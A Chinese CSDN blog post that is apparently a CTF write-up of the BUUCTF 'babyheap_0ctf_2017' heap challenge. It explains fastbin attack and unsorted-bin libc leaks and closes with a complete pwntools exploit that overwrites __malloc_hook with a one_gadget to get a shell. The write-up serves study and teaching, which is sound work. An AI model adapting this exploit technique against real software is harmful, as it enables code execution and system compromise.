Fastbin attack&&Unsortbin leak的综合使用✅

最新推荐文章于 2024-09-07 20:07:03 发布
最新推荐文章于 2024-09-07 20:07:03 发布
阅读量718 收藏 30
点赞数 30
文章标签: 安全威胁分析 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/susu_xiaosu/article/details/140304424
版权

Fastbin attack&&Unsortbin leak的综合使用✅

这是一个综合题目,包括利用Fastbin attack实现多指针指向一个地址,以及利用Unsortbin leak泄露libc基地址和修改__malloc_hook地址为one_gadget

这个题目方法不止这一种,这个是为了体现综合才这样做的,完全可以直接溢出修改下一个堆块的size位实现堆块重叠,然后正常泄露,正常打

题目是buuctf上面的一道题目,题目链接 BUUCTF在线评测

checksec看一下保护

太绿了.....保护全开,不过对于堆题目这也狠正常

那么就64位ida载入

也是有一个菜单和一些功能函数

一个一个看

那么第一个就是申请多大的chunk没有对其赋值

第二个问题来了,没有对size检查,那么可以进行溢出修改到别的chunk

第三个函数把指针什么的都置为0了,那么就没有UAF了

第四个函数可以打印出chunk的内容

仔细检查程序,发现并没有后门函数,那么现在思路是看看能不能能泄露libc,把一个函数替换成one_gadget得到shell

这里Unsortbin leak 可以泄露出libc地址,为什么呢?

Unsortbin leak原理:✅

当只有一个unsortbin被free的时候,它的fd、bk指向一个指针,这个指针指向top chunk地址,这个指针保存在main_arena+0x58偏移处,而main_arena是libc的data段中,是全局静态变量,所以偏移也是固定的,根据这些就可以计算出libc的基地址了

那么要想把它打印出来还不行,因为我们不能打印已经free的chunk(指针置为0了),但是因为是64位的chunk,如果要利用打印上一个chunk来打印这个chunk的内容,那也会有很多的\x00来进行截断,所以也是行不通的,那么我们可以找一个指针指向这个已经free的unsortbin,然后打印这个指针对应的chunk,问题似乎就解决了,那么该怎么做到呢?

如果我们可以利用Fastbin attack先将其加入fastbin 链中然后就有了一个指向它的指针,然后再malloc回来再将他改回原来的大小,再次free得到unsortbin,再打印刚刚指向它的chunk就得到main_arena+0x58处的地址了!

效果如下

可以看见chunk2成功指向chunk4

这个时候我们改变它的size为0x21因为malloc fastbin 有检查, chunksize 必须与相应的 fastbin_index 匹配,所以我们覆盖 chunk 4 的 size 为 fastbin 大小来通过检查

效果如下

chunk4变成了fastbin

再次malloc两个大小为0x10的chunk将这两个chunk2和chunk4拿出来,然后再进行修改chunk size大小为0x91再次申请0x80大小chunk(申请到chunk4)然后再次进行free得到unsortbin

那么就可以得到libc基地址,和one_gadget地址

效果如下

之后我们申请0x60大小chunk将unsortbin进行分割,使其进入fastbin,然后伪造距离__malloc_hook较近的假的chunk来修改__malloc_hook,这个地方一般取__malloc_hook-35这个地方的size比较大而且再fastbin范围内(我本地是0x74)

我们再次修改fd指针

效果如下

再次申请两个大小为0x60的chunk即可申请到我们设置的fakechunk然后修改__malloc_hook为one_gadget就好了,值得注意的是,找的的one_gadget可以有一点点差别,因为libc分为不同的小版本,不同的版本有区别,我们可以把找到的one_gadget加0x10或者减去0x10再试试

最后看看我们做的所有工作

总的来说这题的难度还是不小的,很需要综合能力

最后完整脚本

 最后EXP:

from pwn import *
context(log_level='debug',arch='amd64',os='linux')

io = process('../babyheap_0ctf_2017')
#io = remote('node5.buuoj.cn',28237)
libc = ELF('./libc.so.6')
def add(size):
    io.recvuntil(b'Command: ')
    io.sendline('1')
    io.recvuntil(':')
    io.sendline(str(size))

def fill(index,size,content):
    io.recvuntil(b'Command: ')
    io.sendline('2')
    io.recvuntil(':')
    io.sendline(str(index))
    io.recvuntil(':')
    io.sendline(str(size))
    io.recvuntil(':')
    io.sendline(content)

def free(index):
    io.recvuntil('Command: ')
    io.sendline('3')
    io.recvuntil(':')
    io.sendline(str(index))

def dump(index):
    io.recvuntil('Command: ')
    io.sendline('4')
    io.recvuntil(':')
    io.sendline(str(index))

def exitt():
    io.recvuntil(b'Command: ')
    io.sendline('5')

#gdb.attach(io)
add(0x10)
add(0x10)
add(0x10)
add(0x10)
add(0x80)
gdb.attach(io)
free(1)
free(2)

payload = p64(0)*3 + p64(0x21) +p64(0)*3 + p64(0x21) + p8(0x80)
fill(0,len(payload),payload)
#gdb.attach(io)
payload = p64(0)*3 + p64(0x21)
fill(3,len(payload),payload)
#gdb.attach(io)
add(0x10)
add(0x10)
payload = p64(0)*3 + p64(0x91)
fill(3,len(payload),payload)
#gdb.attach(io)
add(0x80)
free(4)
dump(2)
io.recvuntil(b'\n')
#gdb.attach(io)
main_arena = u64(io.recvuntil(b'\n')[-9:-2].ljust(8,b'\x00'))
__malloc_hook = main_arena-0x58-0x10
success("__malloc_hook---->"+hex(__malloc_hook))
libc_base = main_arena - 0x3c4b78
success("libc_base---->"+hex(libc_base))
one_gadget = libc_base + 0x4526a 

add(0x60)
free(4)
#gdb.attach(io)
payload = p64(__malloc_hook-35)
fill(2,len(payload),payload)
#gdb.attach(io)
add(0x60)
add(0x60) #Fake chunk change __malloc_hook
payload = b'a'*0x10 + b'b'*3 + p64(one_gadget)
fill(6,len(payload),payload)
add(0x88)
io.interactive()

CH13hh
关注
  • 30
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
使用Visual Leak Detector排查内存泄漏问题
dvlinker的技术专栏
09-19 1万+
本文详细讲述使用Visual Leak Detector排查内存泄漏的完整过程。
使用Visual Leak Detector(VLD)排查C++程序内存泄漏
dvlinker的技术专栏
01-09 1万+
本文详细介绍如何使用Visual Leak Detector排查内存泄漏问题。
[pwn]堆:fastbin attack详解
Breeze的博客
12-31 1万+
[pwn]fastbin attack 文章目录[pwn]fastbin attackfastbin attack原理double freeuse after freechunk extend需要注意的点:0ctf:babyheap fastbin attack原理 fastbin attack是利用fastbin分配原理的漏洞,利用要求是我们能够修改“已释放”堆块。通常情况下与double fr...
fastbin attack攻击中关于 malloc__hook
半岛铁盒的博客
07-20 565
概述 在程序中设置钩子,用来在malloc,,对其进行检查,可以看到对应的函数调用后的地址是什么。 malloc__hook 也位于libc中的data段 它是一个地址 当调用 malloc 的时候 它会发生跳转到malloc__hook 所指向的地址 当我们把malloc__hook 所指向的地址 改为 system(“bin/sh”) 再次调用 malloc 的时候 就会发生跳转到 system() 处 操作 上述前提是获取 malloc__hook 的地址 有一个固定的偏移 (libc2.23 //
Fastbin Attack:2015 9447 CTF : Search Engine
Mira_Hu的博客
01-03 130
struct node { char * ptr_cmd; 索引字符串的起始地址, 用于搜索字符串的 命令 int cmd_size; 索引字符串的大小 char * ptr_sentence; 句子的其实地址 int sentence_size; 句子的大小 void * pre_node; 上一个节点 } exp from pwn import * conte...
tcache attack
yjh_fnu_ltn的博客
07-25 1034
在 tcache 中新增了两个结构体,分别是和其中有两个重要的函数,和这两个函数会在函数和的开头被调用,其中tcache_put当所请求的分配大小0x4087。7再复习一遍在tcache_get中,仅仅检查了,此外,我们可以将 tcache 当作一个类似于 fastbin 的单独链表,只是它的 check,并没有 fastbin 那么复杂,仅仅检查。
两种 fastbin attack 方法做 2014 hack.lu oreo
哒君的博客
07-31 630
终于第一次自己独立做出一道完整的堆题 方法一: ctf-wiki 很详细,不多赘述 方法二: 与 ctf-wiki 的思路类似,最终也是控制message的指针来达到任意地址写的目的 但是此处用的是 Arbitrary Alloc ,即控制fastbin块的fd指针来达成目的 具体请看exp的注释 exp: from pwn import * from LibcSearcher import ...
Visual Leak Detector内存泄漏检测机制源码剖析
热门推荐
dvlinker的技术专栏
10-10 1万+
Visual Leak Detector内存泄漏检测机制源码剖析
Ammyy-v3:Ammyy v3源代码泄漏,带有:red_heart:<3-Source code leak
03-25
3-Source code leak" 这个标题表明了一个严重的信息安全事件,即Ammyy v3的源代码被非法获取并公开。Ammyy是一个知名的远程桌面控制软件,版本v3的源码泄露意味着其内部实现细节暴露,可能导致安全漏洞被利用,对...
weblogic漏洞——CVE-2020-14882
weixin_57379923的博客
08-13 1201
版 权 声 明:本博客所有文章除特别声明外,均采用。文章版权归作者所有,未经允许请勿转载!靶机:IP:192.168.100.40。在 web 服务器中写入 xml 脚本。作 者:PeiyuJue。
浅谈网络安全的认识与学习规划
qq_201729558
09-05 837
本文主要介绍网络安全认识与学习规划
数据传输安全——混合加解密(国密)
SheldonChang的博客
09-03 1660
SM2:这是一种基于椭圆曲线密码学(ECC)的非对称加密算法,主要用于数字签名和密钥交换。它提供了一种安全的方式用于保护信息的完整性和机密性。SM4:这是一种对称加密算法,类似于AES,但它使用128位的密钥长度来加密数据。SM4在对称加密中提供了快速的数据加密能力。本文介绍了如何使用Java实现基于国密标准的SM2与SM4混合加密解密工具类。通过这种混合加密方式,可以在保证数据安全的同时,也考虑到了加密解密过程的效率问题。随着国密算法的广泛应用,这类工具将会在越来越多的应用场景中发挥重要作用。
3.比 HTTP 更安全的 HTTPS(工作原理理解、非对称加密理解、证书理解)
最新发布
weixin_52173250的博客
09-07 1209
HTTPS(Hypertext Transfer Protocol Secure)是一种安全的超文本传输协议,主要用于在客户端和服务器之间安全地传输数据
海外直播对网速、带宽、安全的要求
TIANGEKUAJING的博客
09-03 408
要满足海外直播的要求,需要拥有合适的网络配置。在全球化的浪潮下,海外直播正逐渐成为企业、个人和各类组织的重要工具。不论是用于市场推广、品牌宣传,还是与观众互动,海外直播都为参与者带来了丰富的机会。然而,确保高质量的直播效果,必须满足特定的网络条件。
Gartner发布安全威胁情报产品和服务市场指南:威胁情报产品和服务需具备的8项核心能力和21项可选能力
lurenjia404的博客
09-04 1278
安全和风险管理领导者很难知道哪些威胁会真正影响到他们的组织。他们应该利用这项研究来选择正确的安全威胁情报产品和服务,并更有效地了解和应对威胁形势。
注册安全分析报告:央视网
Explinks的博客
09-03 758
央视网作为中央广播电视总台主办的中央重点新闻网站和国家级互联网视频综合传播服务平台, 采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的” , “我们怎么会被盯上呢,不可能的”等等。有一些理由虽然有道理,但是该来的总是会来的。前期欠下来的债,总是要还的。
将AI与情境定位结合以确保品牌安全
微信,抖音等国内主要流量平台打通,企业可以无缝把现有的业务场景接入AI能力
09-04 1336
互动广告局 (IAB) 将品牌安全描述为确保你的广告不会出现在不适当、有害或有争议的内容旁边。这些内容可能会损害品牌形象,并可能削弱目标市场的信任度。品牌适配性更进一步。它不仅确保广告避开有害内容,还确保广告与品牌的身份和价值观一致。此举在于寻找广告的“合适”位置,而不仅仅是“安全”的位置。例如,确保奢侈品牌仅出现在高端生活方式内容旁边。
低代码平台中的统一认证与单点登录(SSO):实现简化与安全的用户管理
CC_longhua的博客
09-04 1322
低代码平台是一种允许用户通过图形化界面而非编写大量代码来构建应用程序的工具。这种平台的优势在于能够大幅度缩短开发周期、降低开发成本,并使得非技术人员也能参与到应用开发中。常见的低代码平台有OutSystems、Mendix、Appian等。统一认证是指通过一个中央系统进行用户身份验证的过程。用户只需在中央认证系统中进行一次身份验证,即可访问多个应用程序或服务。这种方式不仅提升了用户体验,还简化了后台的用户管理。对于有特殊需求的企业,低代码平台通常允许用户通过自定义代码来实现更复杂的认证逻辑。
Visual Leak Detector怎样使用
06-10
下面是使用 Visual Leak Detector 检测内存泄漏的步骤: 1. 首先需要下载 Visual Leak Detector,可以从官方网站(https://vld.codeplex.com/)下载最新版本。 2. 将 Visual Leak Detector 的头文件和库文件添加到...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值